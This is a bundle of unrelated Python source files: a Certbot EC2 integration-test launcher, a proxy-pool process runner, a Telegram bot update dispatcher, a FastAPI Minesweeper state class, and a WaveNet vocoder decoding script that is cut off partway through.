if i%5000==0:
warnings.warn(str(i) + ' in ' + str(round((time.time()-t1)/3600,2)))
threads = [threading.Thread(target=getWikipediaStats, args=(page,)) for page in pages]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
f.close()
#print round(time.time()-t1)
|
multitester.py
|
"""
Certbot Integration Test Tool
- Launches EC2 instances with a given list of AMIs for different distros
- Copies certbot repo and puts it on the instances
- Runs certbot tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances; if more
are needed, they must be requested via the online web form.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>letstest targets/targets.yaml MyKeyPair.pem HappyHacker scripts/test_apache2.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
import argparse
import multiprocessing as mp
from multiprocessing import Manager
import os
import socket
import sys
import tempfile
import time
import traceback
import urllib.error as urllib_error
import urllib.request as urllib_request
import boto3
from botocore.exceptions import ClientError
import yaml
from fabric import Config
from fabric import Connection
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_apache2.sh',
help='path of bash script to deploy and run')
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='certbot git repo to use')
parser.add_argument('--branch',
default='~',
help='certbot git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = None if cl_args.aws_profile == 'SET_BY_ENV' else cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
SECURITY_GROUP_NAME = 'certbot-security-group'
SENTINEL = None #queue kill signal
SUBNET_NAME = 'certbot-subnet'
class Status:
"""Possible statuses of client tests."""
PASS = 'pass'
FAIL = 'fail'
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def should_use_subnet(subnet):
"""Should we use the given subnet for these tests?
We should if it is the default subnet for the availability zone or the
subnet is named "certbot-subnet".
"""
if not subnet.map_public_ip_on_launch:
return False
if subnet.default_for_az:
return True
for tag in subnet.tags:
if tag['Key'] == 'Name' and tag['Value'] == SUBNET_NAME:
return True
return False
def make_security_group(vpc):
"""Creates a security group in the given VPC."""
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = vpc.create_security_group(GroupName=SECURITY_GROUP_NAME,
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(ec2_client,
instance_name,
ami_id,
keyname,
security_group_id,
subnet_id,
self_destruct,
machine_type='t2.micro'):
"""Creates an instance using the given parameters.
If self_destruct is True, the instance will be configured to shutdown after
1 hour and to terminate itself on shutdown.
"""
block_device_mappings = _get_block_device_mappings(ec2_client, ami_id)
tags = [{'Key': 'Name', 'Value': instance_name}]
tag_spec = [{'ResourceType': 'instance', 'Tags': tags}]
kwargs = {
'BlockDeviceMappings': block_device_mappings,
'ImageId': ami_id,
'SecurityGroupIds': [security_group_id],
'SubnetId': subnet_id,
'KeyName': keyname,
'MinCount': 1,
'MaxCount': 1,
'InstanceType': machine_type,
'TagSpecifications': tag_spec
}
if self_destruct:
kwargs['InstanceInitiatedShutdownBehavior'] = 'terminate'
kwargs['UserData'] = '#!/bin/bash\nshutdown -P +60\n'
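# The user-data script powers the instance off after 60 minutes; combined with the
# 'terminate' shutdown behavior above, forgotten instances clean themselves up.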
return ec2_client.create_instances(**kwargs)[0]
def _get_block_device_mappings(ec2_client, ami_id):
"""Returns the list of block device mappings to ensure cleanup.
This list sets connected EBS volumes to be deleted when the EC2
instance is terminated.
"""
# Not all devices use EBS, but the default value for DeleteOnTermination
# when the device does use EBS is true. See:
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-mapping.html
# * https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-ec2-blockdev-template.html
return [{'DeviceName': mapping['DeviceName'],
'Ebs': {'DeleteOnTermination': True}}
for mapping in ec2_client.Image(ami_id).block_device_mappings
if not mapping.get('Ebs', {}).get('DeleteOnTermination', True)]
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
booting_instance.wait_until_running()
# The instance needs to be reloaded to update its local attributes. See
# https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/ec2.html#EC2.Instance.reload.
booting_instance.reload()
# After waiting for the instance to be running and reloading the instance
# state, we should have an IP address.
assert booting_instance.public_ip_address is not None
block_until_ssh_open(booting_instance.public_ip_address)
time.sleep(extra_wait_time)
return booting_instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(local_cxn, repo_url, log_dir):
"""clones master of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt'% (log_dir, repo_url))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt'% log_dir)
def local_git_branch(local_cxn, repo_url, branch_name, log_dir):
"""clones branch <branch_name> of repo_url"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt --branch %s --single-branch'%
(log_dir, repo_url, branch_name))
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_git_PR(local_cxn, repo_url, PRnumstr, log_dir, merge_master=True):
"""clones specified pull request from repo_url and optionally merges into master"""
local_cxn.local('cd %s && if [ -d letsencrypt ]; then rm -rf letsencrypt; fi' % log_dir)
local_cxn.local('cd %s && git clone %s letsencrypt' % (log_dir, repo_url))
local_cxn.local('cd %s && cd letsencrypt && '
'git fetch origin pull/%s/head:lePRtest' % (log_dir, PRnumstr))
local_cxn.local('cd %s && cd letsencrypt && git checkout lePRtest' % log_dir)
if merge_master:
local_cxn.local('cd %s && cd letsencrypt && git remote update origin' % log_dir)
local_cxn.local('cd %s && cd letsencrypt && '
'git merge origin/master -m "testmerge"' % log_dir)
local_cxn.local('cd %s && tar czf le.tar.gz letsencrypt' % log_dir)
def local_repo_to_remote(cxn, log_dir):
"""copies local tarball of repo to remote"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
cxn.put(local=local_path, remote='')
cxn.run('tar xzf %s' % filename)
def local_repo_clean(local_cxn, log_dir):
"""delete tarball"""
filename = 'le.tar.gz'
local_path = os.path.join(log_dir, filename)
local_cxn.local('rm %s' % local_path)
def deploy_script(cxn, scriptpath, *args):
"""copies to remote and executes local script"""
cxn.put(local=scriptpath, remote='', preserve_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
cxn.run('./'+scriptfile+' '+args_str)
def install_and_launch_certbot(cxn, instance, target, log_dir):
local_repo_to_remote(cxn, log_dir)
# This needs to be like this, I promise. 1) The env argument to run doesn't work.
# See https://github.com/fabric/fabric/issues/1744. 2) prefix() sticks an && between
# the commands, so it needs to be exports rather than no &&s in between for the script subshell.
with cxn.prefix('export PUBLIC_IP=%s && export PRIVATE_IP=%s && '
'export PUBLIC_HOSTNAME=%s && export PIP_EXTRA_INDEX_URL=%s && '
'export OS_TYPE=%s' %
(instance.public_ip_address,
instance.private_ip_address,
instance.public_dns_name,
cl_args.alt_pip,
target['type'])):
deploy_script(cxn, cl_args.test_script)
def grab_certbot_log(cxn):
"grabs letsencrypt.log via cat into logged stdout"
cxn.sudo('/bin/bash -l -i -c \'if [ -f "/var/log/letsencrypt/letsencrypt.log" ]; then ' +
'cat "/var/log/letsencrypt/letsencrypt.log"; else echo "[novarlog]"; fi\'')
# fallback file if /var/log is unwriteable...? correct?
cxn.sudo('/bin/bash -l -i -c \'if [ -f ./certbot.log ]; then ' +
'cat ./certbot.log; else echo "[nolocallog]"; fi\'')
def create_client_instance(ec2_client, target, security_group_id, subnet_id, self_destruct):
"""Create a single client instance for running tests."""
if 'machine_type' in target:
machine_type = target['machine_type']
elif target['virt'] == 'hvm':
machine_type = 't2.medium'
else:
# 32 bit systems
machine_type = 'c1.medium'
name = 'le-%s'%target['name']
print(name, end=" ")
return make_instance(ec2_client,
name,
target['ami'],
KEYNAME,
machine_type=machine_type,
security_group_id=security_group_id,
subnet_id=subnet_id,
self_destruct=self_destruct)
def test_client_process(fab_config, inqueue, outqueue, log_dir):
cur_proc = mp.current_process()
for inreq in iter(inqueue.get, SENTINEL):
ii, instance_id, target = inreq
# Each client process is given its own session due to the suggestion at
# https://boto3.amazonaws.com/v1/documentation/api/latest/guide/resources.html?highlight=multithreading#multithreading-multiprocessing.
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
instance = ec2_client.Instance(id=instance_id)
#save all stdout to log file
sys.stdout = open(log_dir+'/'+'%d_%s.log'%(ii,target['name']), 'w')
print("[%s : client %d %s %s]" % (cur_proc.name, ii, target['ami'], target['name']))
instance = block_until_instance_ready(instance)
print("server %s at %s"%(instance, instance.public_ip_address))
host_string = "%s@%s"%(target['user'], instance.public_ip_address)
print(host_string)
with Connection(host_string, config=fab_config) as cxn:
try:
install_and_launch_certbot(cxn, instance, target, log_dir)
outqueue.put((ii, target, Status.PASS))
print("%s - %s SUCCESS"%(target['ami'], target['name']))
except:
outqueue.put((ii, target, Status.FAIL))
print("%s - %s FAIL"%(target['ami'], target['name']))
traceback.print_exc(file=sys.stdout)
pass
# append server certbot.log to each per-machine output log
print("\n\ncertbot.log\n" + "-"*80 + "\n")
try:
grab_certbot_log(cxn)
except:
print("log fail\n")
traceback.print_exc(file=sys.stdout)
pass
def cleanup(cl_args, instances, targetlist, log_dir):
print('Logs in ', log_dir)
# If lengths of instances and targetlist aren't equal, instances failed to
# start before running tests so leaving instances running for debugging
# isn't very useful. Let's cleanup after ourselves instead.
if len(instances) != len(targetlist) or not cl_args.saveinstances:
print('Terminating EC2 Instances')
for instance in instances:
instance.terminate()
else:
# print login information for the boxes for debugging
for ii, target in enumerate(targetlist):
print(target['name'],
target['ami'],
"%s@%s"%(target['user'], instances[ii].public_ip_address))
def main():
# Fabric library controlled through global env parameters
fab_config = Config(overrides={
"connect_kwargs": {
"key_filename": [KEYFILE], # https://github.com/fabric/fabric/issues/2007
},
"run": {
"echo": True,
"pty": True,
},
"timeouts": {
"connect": 10,
},
})
# no network connection, so don't worry about closing this one.
local_cxn = Connection('localhost', config=fab_config)
# Set up local copy of git repo
#-------------------------------------------------------------------------------
log_dir = tempfile.mkdtemp() # points to logging / working directory
print("Local dir for test repo and logs: %s"%log_dir)
try:
# figure out what git object to test and locally create it in log_dir
print("Making local git repo")
if cl_args.pull_request != '~':
print('Testing PR %s ' % cl_args.pull_request,
"MERGING into master" if cl_args.merge_master else "")
local_git_PR(local_cxn, cl_args.repo, cl_args.pull_request, log_dir,
cl_args.merge_master)
elif cl_args.branch != '~':
print('Testing branch %s of %s' % (cl_args.branch, cl_args.repo))
local_git_branch(local_cxn, cl_args.repo, cl_args.branch, log_dir)
else:
print('Testing current branch of %s' % cl_args.repo, log_dir)
local_git_clone(local_cxn, cl_args.repo, log_dir)
except BaseException:
print("FAIL: trouble with git repo")
traceback.print_exc()
exit(1)
# Set up EC2 instances
#-------------------------------------------------------------------------------
configdata = yaml.safe_load(open(cl_args.config_file, 'r'))
targetlist = configdata['targets']
print('Testing against these images: [%d total]'%len(targetlist))
for target in targetlist:
print(target['ami'], target['name'])
print("Connecting to EC2 using\n profile %s\n keyname %s\n keyfile %s"%(PROFILE, KEYNAME, KEYFILE))
aws_session = boto3.session.Session(profile_name=PROFILE)
ec2_client = aws_session.resource('ec2')
print("Determining Subnet")
for subnet in ec2_client.subnets.all():
if should_use_subnet(subnet):
subnet_id = subnet.id
vpc_id = subnet.vpc.id
break
else:
print("No usable subnet exists!")
print("Please create a VPC with a subnet named {0}".format(SUBNET_NAME))
print("that maps public IPv4 addresses to instances launched in the subnet.")
sys.exit(1)
print("Making Security Group")
vpc = ec2_client.Vpc(vpc_id)
sg_exists = False
for sg in vpc.security_groups.all():
if sg.group_name == SECURITY_GROUP_NAME:
security_group_id = sg.id
sg_exists = True
print(" %s already exists"%SECURITY_GROUP_NAME)
if not sg_exists:
security_group_id = make_security_group(vpc).id
time.sleep(30)
instances = []
try:
print("Creating instances: ", end="")
# If we want to preserve instances, do not have them self-destruct.
self_destruct = not cl_args.saveinstances
for target in targetlist:
instances.append(
create_client_instance(ec2_client, target,
security_group_id, subnet_id,
self_destruct)
)
print()
# Install and launch client scripts in parallel
#-------------------------------------------------------------------------------
print("Uploading and running test script in parallel: %s"%cl_args.test_script)
print("Output routed to log files in %s"%log_dir)
# (Advice: always use Manager.Queue, never regular multiprocessing.Queue;
# the latter has implementation flaws that deadlock it in some circumstances)
manager = Manager()
outqueue = manager.Queue()
inqueue = manager.Queue()
# launch as many processes as clients to test
num_processes = len(targetlist)
jobs = [] #keep a reference to current procs
# initiate process execution
client_process_args=(fab_config, inqueue, outqueue, log_dir)
for i in range(num_processes):
p = mp.Process(target=test_client_process, args=client_process_args)
jobs.append(p)
p.daemon = True # kills subprocesses if parent is killed
p.start()
# fill up work queue
for ii, target in enumerate(targetlist):
inqueue.put((ii, instances[ii].id, target))
# add SENTINELs to end client processes
for i in range(num_processes):
inqueue.put(SENTINEL)
print('Waiting on client processes', end='')
for p in jobs:
while p.is_alive():
p.join(5 * 60)
# Regularly print output to keep Travis happy
print('.', end='')
sys.stdout.flush()
print()
# add SENTINEL to output queue
outqueue.put(SENTINEL)
# clean up
local_repo_clean(local_cxn, log_dir)
# print and save summary results
results_file = open(log_dir+'/results', 'w')
outputs = list(iter(outqueue.get, SENTINEL))
outputs.sort(key=lambda x: x[0])
failed = False
results_msg = ""
for outq in outputs:
ii, target, status = outq
if status == Status.FAIL:
failed = True
with open(log_dir+'/'+'%d_%s.log'%(ii,target['name']), 'r') as f:
print(target['name'] + " test failed. Test log:")
print(f.read())
results_msg = results_msg + '%d %s %s\n'%(ii, target['name'], status)
results_file.write('%d %s %s\n'%(ii, target['name'], status))
print(results_msg)
if len(outputs) != num_processes:
failed = True
failure_message = 'FAILURE: Some target machines failed to run and were not tested. ' +\
'Tests should be rerun.'
print(failure_message)
results_file.write(failure_message + '\n')
results_file.close()
if failed:
sys.exit(1)
finally:
cleanup(cl_args, instances, targetlist, log_dir)
if __name__ == '__main__':
main()
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
Description : run the main function
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
from multiprocessing import Process
import time
sys.path.append('../')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run():
p_list = list()
p1 = Process(target=ProxyApiRun, name='ProxyApiRun')
p_list.append(p1)
p2 = Process(target=ValidRun, name='ValidRun')
p_list.append(p2)
p3 = Process(target=RefreshRun, name='RefreshRun')
p_list.append(p3)
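# All three workers run as daemon processes so they exit with the parent; the join() loop below keeps the parent alive.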
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
print("Waiting for MongoDB...")
time.sleep(10)
run()
|
obupdater.py
|
import telegram
import queue
import html
import logging
from obupdater import long_poll, webhooks
import urllib.parse
import settings
import threading
import traceback
import sentry_support
class OBUpdater:
def __init__(self, bot, modloader):
self.logger = logging.getLogger("OBUpdater")
self.upd_queue = queue.Queue()
self.bot = bot
self.modloader = modloader
self.bot.modloader = self.modloader
self.update_id = 0
def update_handle(self, bot, update):
raise RuntimeError
def command_handle(self, bot, update):
raise RuntimeError
def message_handle(self, bot, update):
raise RuntimeError
def inline_handle(self, bot, update):
raise RuntimeError
def inline_kbd_handle(self, bot, update):
raise RuntimeError
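# The *_handle methods above are placeholders (they raise RuntimeError); the real handlers
# are expected to be attached elsewhere, e.g. by the modloader, before updates are processed.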
def _poll_worker(self):
while True:
bot, update = self.upd_queue.get()
try:
if update.update_id < self.update_id - 1:
continue
if update.message:
if update.message.caption:
update.message.text = update.message.caption
if update.message.reply_to_message:
if update.message.reply_to_message.caption:
update.message.reply_to_message.text = update.message.reply_to_message.caption
if not update.message.text:
update.message.text = ""
if self.message_handle(bot, update):
continue
if self.command_handle(bot, update):
continue
elif update.inline_query:
if self.inline_handle(bot, update):
continue
elif update.callback_query:
if self.inline_kbd_handle(bot, update):
continue
self.update_handle(bot, update)
except (telegram.error.Unauthorized, telegram.error.NetworkError): pass
except Exception as e:
self.logger.error(e)
try:
if settings.USE_SENTRY:
sentry_support.catch_exc(update.to_dict())
else:
bot.sendMessage(
settings.ADMIN,
"Uncatched worker Exception:\n<code>%s</code>\nUpdate:\n<code>%s</code>" %
(html.escape(traceback.format_exc()), update), parse_mode="HTML")
except Exception as e:
self.logger.error("Unable to send exception report!")
self.logger.error(e)
def _create_workers(self):
self.logger.info("Creating update workers...")
for i in range(0, settings.THREADS):
self.logger.debug("Creating update worker %s out of %s", i+1, settings.THREADS)
threading.Thread(target=self._poll_worker).start()
self.logger.info("Creating update workers done")
def start_poll(self):
self.bot.deleteWebhook() # Make sure no webhooks are installed
self._create_workers()
mirrors = settings.MIRRORS
mirrors["Main Bot"] = settings.TOKEN
for mirror_name, mirror_token in mirrors.items():
upd_poller = long_poll.create_poll(mirror_name, mirror_token, self.upd_queue, self.modloader)
threading.Thread(target=upd_poller).start()
def start_webhook(self):
self.bot.deleteWebhook() # Make sure no other webhooks are installed
self._create_workers()
webhook = webhooks.create_webhook(self.upd_queue, self.bot)
self.bot.setWebhook(url=urllib.parse.urljoin(settings.WEBHOOK_URL, "/%s" % settings.TOKEN))
webhook.run(host=settings.WEBHOOK_PORT_EXPOSE, port=settings.WEBHOOK_PORT)
|
state.py
|
import logging
import time
from threading import RLock
from typing import Optional
from fastapi import HTTPException, status
from minesweeper.game import Minesweeper, Status
from .models import Move, Square, Start
def _iter_game(game: Minesweeper):
from dataclasses import asdict
separator = ','.encode('utf-8')
yield '{"items":['.encode('utf-8')
for idx, square in enumerate(game):
if idx != 0:
yield separator
yield Square.construct(Square.__fields_set__, **asdict(square)).json(exclude_none=True).encode('utf-8')
yield f'],"status":"{game.status}"'.encode('utf-8')
yield '}'.encode('utf-8')
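# _iter_game yields the JSON payload piece by piece so callers can stream a (possibly large)
# board without building the whole document in memory.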
class State:
_log: logging.Logger = logging.getLogger('uvicorn.error')
_lock: RLock
_game: Optional[Minesweeper]
_start: float = 0
_stop_init: float = 0
_stop_game: float = 0
@property
def log(self):
return State._log
def __init__(self):
self._lock = RLock()
self._game = None
def __call__(self): # pragma: nocover
"""For FastAPI compatibility
"""
return self
def _started(self):
if self._game is None:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail='Game Not Started')
def _initialized(self):
self._started()
if self._game.status is Status.INITIALIZING:
raise HTTPException(status_code=status.HTTP_202_ACCEPTED, detail='Initializing')
def _done(self):
self._initialized()
if self._game.status is not Status.ONGOING:
raise HTTPException(status_code=status.HTTP_410_GONE, detail='Game Ended')
def status(self):
"""
Check status
"""
self._done()
@property
def game(self):
"""
Check common conditions and get the game
"""
self._done()
return self._game
def _initialize(self):
"""
Wait for field init
"""
self._game.initialize()
with self._lock:
self.__thread = None
self._stop_init = time.time()
self.log.info(
f'Game Initialization Finished, took: {round((self._stop_init - self._start) * 1000, 2):.2f} ms'
)
def _start_init_task(self):
import threading
self.__thread = threading.Thread(target=self._initialize, daemon=True)
self.__thread.start()
def initialize(self, start: Start):
"""
Initialize a game
"""
if self._game is None:
with self._lock:
if self._game is None:
self._start = time.time()
self._game = Minesweeper(start.width, start.height, start.mines) # Validated so won't throw
Move.adapt(self._game)
self._start_init_task()
self.log.info('Initialized a game')
return # Return here
raise HTTPException(status_code=status.HTTP_410_GONE, detail='Already Started')
def all(self):
"""
Iterate all open and flagged squares
"""
self._initialized()
return _iter_game(self._game)
def flag(self, x: int, y: int, set_flag: bool) -> int:
"""
Set or unset flag
"""
with self._lock:
s = self.game.check(x, y)
if (set_flag and not s.flag) or (not set_flag and s.flag):
m = self._game.flag(x, y)
if len(m.items) != 0:
return 201 if set_flag else 204
return 304
def check(self, x: int, y: int):
"""
Check a square
"""
self._initialized()
return self._game.check(x, y)
def open(self, x: int, y: int):
"""
Make a move
"""
with self._lock:
m = self.game.open(x, y)
if m.status is not None and m.status is not Status.ONGOING:
self._stop_game = time.time()
self.log.info(
f'Game Finished, took: {round(self._stop_game - self._start, 2):.2f} s'
)
elif len(m.items) == 0:
return None
return m
__all__ = ['State']
|
decode.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import argparse
import logging
import math
import os
import sys
import numpy as np
import soundfile as sf
import torch
import torch.multiprocessing as mp
from sklearn.preprocessing import StandardScaler
from torchvision import transforms
from wavenet_vocoder.nets.wavenet_utils import decode_mu_law
from wavenet_vocoder.nets.wavenet_utils import encode_mu_law
from wavenet_vocoder.nets import WaveNet
from wavenet_vocoder.utils import extend_time
from wavenet_vocoder.utils import find_files
from wavenet_vocoder.utils import read_hdf5
from wavenet_vocoder.utils import read_txt
from wavenet_vocoder.utils import shape_hdf5
def pad_list(batch_list, pad_value=0.0):
"""PAD VALUE.
Args:
batch_list (list): List of batch, where the shape of i-th batch (T_i, C).
pad_value (float): Value to pad.
Returns:
ndarray: Padded batch with the shape (B, T_max, C).
"""
batch_size = len(batch_list)
maxlen = max([batch.shape[0] for batch in batch_list])
n_feats = batch_list[0].shape[-1]
batch_pad = np.zeros((batch_size, maxlen, n_feats))
for idx, batch in enumerate(batch_list):
batch_pad[idx, :batch.shape[0]] = batch
return batch_pad
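# Example (hypothetical shapes): pad_list([np.zeros((3, 2)), np.zeros((5, 2))]) returns an
# array of shape (2, 5, 2), with the shorter batch zero-padded along the time axis.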
def decode_generator(feat_list,
batch_size=32,
feature_type="world",
wav_transform=None,
feat_transform=None,
upsampling_factor=80,
use_upsampling_layer=True,
use_speaker_code=False,
pulse=True):
"""GENERATE DECODING BATCH.
Args:
feat_list (list): List of feature files.
batch_size (int): Batch size in decoding.
feature_type (str): Feature type.
wav_transform (func): Preprocessing function for waveform.
feat_transform (func): Preprocessing function for aux feats.
upsampling_factor (int): Upsampling factor.
use_upsampling_layer (bool): Whether to use upsampling layer.
use_speaker_code (bool): Whether to use speaker code.
Returns:
generator: Generator instance.
"""
# ---------------------------
# sample-by-sample generation
# ---------------------------
if batch_size == 1:
for featfile in feat_list:
x = np.zeros((1))
h = read_hdf5(featfile, "/" + feature_type)
if not use_upsampling_layer:
h = extend_time(h, upsampling_factor)
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# convert to torch variable
x = torch.from_numpy(x).long()
h = torch.from_numpy(h).float()
x = x.unsqueeze(0) # 1 => 1 x 1
h = h.transpose(0, 1).unsqueeze(0) # T x C => 1 x C x T
# send to cuda
if torch.cuda.is_available():
x = x.cuda()
h = h.cuda()
# get target length and file id
if not use_upsampling_layer:
n_samples = h.size(2) - 1
else:
n_samples = h.size(2) * upsampling_factor - 1
feat_id = os.path.basename(featfile).replace(".h5", "")
yield feat_id, (x, h, n_samples)
# ----------------
# batch generation
# ----------------
else:
# sort with the feature length
shape_list = [shape_hdf5(f, "/" + feature_type)[0] for f in feat_list]
idx = np.argsort(shape_list)
feat_list = [feat_list[i] for i in idx]
# divide into batch list
n_batch = math.ceil(len(feat_list) / batch_size)
batch_lists = np.array_split(feat_list, n_batch)
batch_lists = [f.tolist() for f in batch_lists]
for batch_list in batch_lists:
batch_x = []
batch_h = []
n_samples_list = []
feat_ids = []
for featfile in batch_list:
# make seed waveform and load aux feature
x = np.zeros((1))
h = read_hdf5(featfile, "/" + feature_type)
if not use_upsampling_layer:
h = extend_time(h, upsampling_factor)
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
# append to list
batch_x += [x]
batch_h += [h]
if not use_upsampling_layer:
n_samples_list += [h.shape[0] - 1]
else:
n_samples_list += [h.shape[0] * upsampling_factor - 1]
feat_ids += [os.path.basename(featfile).replace(".h5", "")]
# convert list to ndarray
batch_x = np.stack(batch_x, axis=0)
batch_h = pad_list(batch_h)
# convert to torch variable
batch_x = torch.from_numpy(batch_x).long()
batch_h = torch.from_numpy(batch_h).float().transpose(1, 2)
# send to cuda
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
yield feat_ids, (batch_x, batch_h, n_samples_list)
def main():
"""RUN DECODING."""
parser = argparse.ArgumentParser()
# decode setting
parser.add_argument("--feats", required=True,
type=str, help="list or directory of aux feat files")
parser.add_argument("--checkpoint", required=True,
type=str, help="model file")
parser.add_argument("--outdir", required=True,
type=str, help="directory to save generated samples")
parser.add_argument("--stats", default=None,
type=str, help="hdf5 file including statistics")
parser.add_argument("--config", default=None,
type=str, help="configure file")
parser.add_argument("--fs", default=16000,
type=int, help="sampling rate")
parser.add_argument("--batch_size", default=32,
type=int, help="number of batch size in decoding")
parser.add_argument("--n_gpus", default=1,
type=int, help="number of gpus")
# other setting
parser.add_argument("--intervals", default=1000,
type=int, help="log interval")
parser.add_argument("--seed", default=1,
type=int, help="seed number")
parser.add_argument("--verbose", default=1,
type=int, help="log level")
args = parser.parse_args()
# set log level
if args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
elif args.verbose > 0:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
else:
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
logging.warning("logging is disabled.")
# show arguments
for key, value in vars(args).items():
logging.info("%s = %s" % (key, str(value)))
# check arguments
if args.stats is None:
args.stats = os.path.dirname(args.checkpoint) + "/stats.h5"
if args.config is None:
args.config = os.path.dirname(args.checkpoint) + "/model.conf"
if not os.path.exists(args.stats):
raise FileNotFoundError("statistics file is missing (%s)." % (args.stats))
if not os.path.exists(args.config):
raise FileNotFoundError("config file is missing (%s)." % (args.config))
# check directory existence
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
# fix seed
os.environ['PYTHONHASHSEED'] = str(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
# fix slow computation of dilated conv
# https://github.com/pytorch/pytorch/issues/15054#issuecomment-450191923
torch.backends.cudnn.benchmark = True
# load config
config = torch.load(args.config)
# get file list
if os.path.isdir(args.feats):
feat_list = sorted(find_files(args.feats, "*.h5"))
elif os.path.isfile(args.feats):
feat_list = read_txt(args.feats)
else:
logging.error("--feats should be directory or list.")
sys.exit(1)
# prepare the file list for parallel decoding
feat_lists = np.array_split(feat_list, args.n_gpus)
feat_lists = [f_list.tolist() for f_list in feat_lists]
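# Each GPU gets an (approximately) equal slice of the feature files; gpu_decode below runs
# one decoding process per slice.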
# define transform
scaler = StandardScaler()
scaler.mean_ = read_hdf5(args.stats, "/" + config.feature_type + "/mean")
scaler.scale_ = read_hdf5(args.stats, "/" + config.feature_type + "/scale")
wav_transform = transforms.Compose([
lambda x: encode_mu_law(x, config.n_quantize)])
feat_transform = transforms.Compose([
lambda x: scaler.transform(x)])
# define gpu decode function
def gpu_decode(feat_list, gpu):
# set default gpu and do not track gradient
torch.cuda.set_device(gpu)
torch.set_grad_enabled(False)
# define model and load parameters
